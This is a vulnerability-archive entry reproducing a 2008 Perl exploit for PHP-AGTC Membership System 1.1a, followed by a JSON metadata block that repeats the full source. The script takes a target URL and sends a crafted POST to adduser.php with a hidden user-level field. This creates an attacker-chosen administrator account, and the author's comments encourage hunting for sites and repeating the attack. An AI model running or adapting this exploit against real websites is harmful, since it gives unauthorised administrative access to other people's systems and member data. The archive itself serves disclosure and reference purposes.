Search...

PHP-AGTC Membership System 1.1a - Arbitrary Add Admin

2008-05-18T00:00:00

ID EXPLOITPACK:46896C59EDE14D9786D05EA16B372292
Type exploitpack
Reporter t0pP8uZz
Modified 2008-05-18T00:00:00

Description

PHP-AGTC Membership System 1.1a - Arbitrary Add Admin

                                        
                                            #!/usr/bin/perl

# Note: adduser.php is accessable to a guest/any-user, but if you access through a browser you cant add admin, theres a hidden POST buried in the script, which contains the userlevel.
# Note: alot of sites run this script and they remove the "powered by" dork. Also you can get access to alot of nice site's member sections using this, since its a member management script.

use strict;
use LWP::UserAgent;

print "-+--[ PHP AGTC-Membership System &lt;= 1.1a Arbitrary Add-Admin Exploit ] --+-\n";
print "-+-- Discovered && Coded By: t0pP8uZz  /  Discovered On: 16 MAY 2008   --+-\n";
print "-+-- 1.1a tested, not sure if there are new versions, if there are...  --+-\n";
print "-+-- ... there probarly affected too. Script Download: agtc.co.uk      --+-\n";
print "-+--          Greetz: h4ck-y0u.org, milw0rm.com, CipherCrew            --+-\n";
print "-+--[ PHP AGTC-Membership System &lt;= 1.1a Arbitrary Add-Admin Exploit ] --+-\n";

print "\nEnter URL(http://site.com): ";
	chomp(my $url=&lt;STDIN&gt;);

print "\nAdmin Username(create's your admin username): ";
	chomp(my $usr=&lt;STDIN&gt;);
	
print "\nAdmin Password(create's your admin password): ";
	chomp(my $pwd=&lt;STDIN&gt;);

my $email = "user".int(rand(9999))."\@localhost.com"; # generates a random email, if a attacker has already exploited this site, this allows the script to add another admin account.
my $ua    = LWP::UserAgent-&gt;new( agent =&gt; "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" );
my $ob    = $ua-&gt;post( $url."/adduser.php", { "username" =&gt; $usr, "userpass" =&gt; $pwd, "useremail" =&gt; $email, "userlevel" =&gt; 4, "Submit" =&gt; 1} );

if($ob-&gt;is_success && index($ob-&gt;content, "registered") != -1) {
	print "Exploit Successfull! Admin Created! Login: $url\n";
} else { print "Failed. Cause's: username exists or site not vulnerable, try again!"; }

# milw0rm.com [2008-05-18]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:41", "references": [], "description": "\nPHP-AGTC Membership System 1.1a - Arbitrary Add Admin", "edition": 1, "reporter": "t0pP8uZz", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2008-05-18T00:00:00", "title": "PHP-AGTC Membership System 1.1a - Arbitrary Add Admin", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:41", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2020-04-01T19:04:41", "rev": 2}, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-05-18T00:00:00", "id": "EXPLOITPACK:46896C59EDE14D9786D05EA16B372292", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/perl\n\n# Note: adduser.php is accessable to a guest/any-user, but if you access through a browser you cant add admin, theres a hidden POST buried in the script, which contains the userlevel.\n# Note: alot of sites run this script and they remove the \"powered by\" dork. Also you can get access to alot of nice site's member sections using this, since its a member management script.\n\nuse strict;\nuse LWP::UserAgent;\n\nprint \"-+--[ PHP AGTC-Membership System <= 1.1a Arbitrary Add-Admin Exploit ] --+-\\n\";\nprint \"-+-- Discovered && Coded By: t0pP8uZz / Discovered On: 16 MAY 2008 --+-\\n\";\nprint \"-+-- 1.1a tested, not sure if there are new versions, if there are... --+-\\n\";\nprint \"-+-- ... there probarly affected too. Script Download: agtc.co.uk --+-\\n\";\nprint \"-+-- Greetz: h4ck-y0u.org, milw0rm.com, CipherCrew --+-\\n\";\nprint \"-+--[ PHP AGTC-Membership System <= 1.1a Arbitrary Add-Admin Exploit ] --+-\\n\";\n\nprint \"\\nEnter URL(http://site.com): \";\n\tchomp(my $url=<STDIN>);\n\nprint \"\\nAdmin Username(create's your admin username): \";\n\tchomp(my $usr=<STDIN>);\n\t\nprint \"\\nAdmin Password(create's your admin password): \";\n\tchomp(my $pwd=<STDIN>);\n\nmy $email = \"user\".int(rand(9999)).\"\\@localhost.com\"; # generates a random email, if a attacker has already exploited this site, this allows the script to add another admin account.\nmy $ua = LWP::UserAgent->new( agent => \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\" );\nmy $ob = $ua->post( $url.\"/adduser.php\", { \"username\" => $usr, \"userpass\" => $pwd, \"useremail\" => $email, \"userlevel\" => 4, \"Submit\" => 1} );\n\nif($ob->is_success && index($ob->content, \"registered\") != -1) {\n\tprint \"Exploit Successfull! Admin Created! Login: $url\\n\";\n} else { print \"Failed. Cause's: username exists or site not vulnerable, try again!\"; }\n\n# milw0rm.com [2008-05-18]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}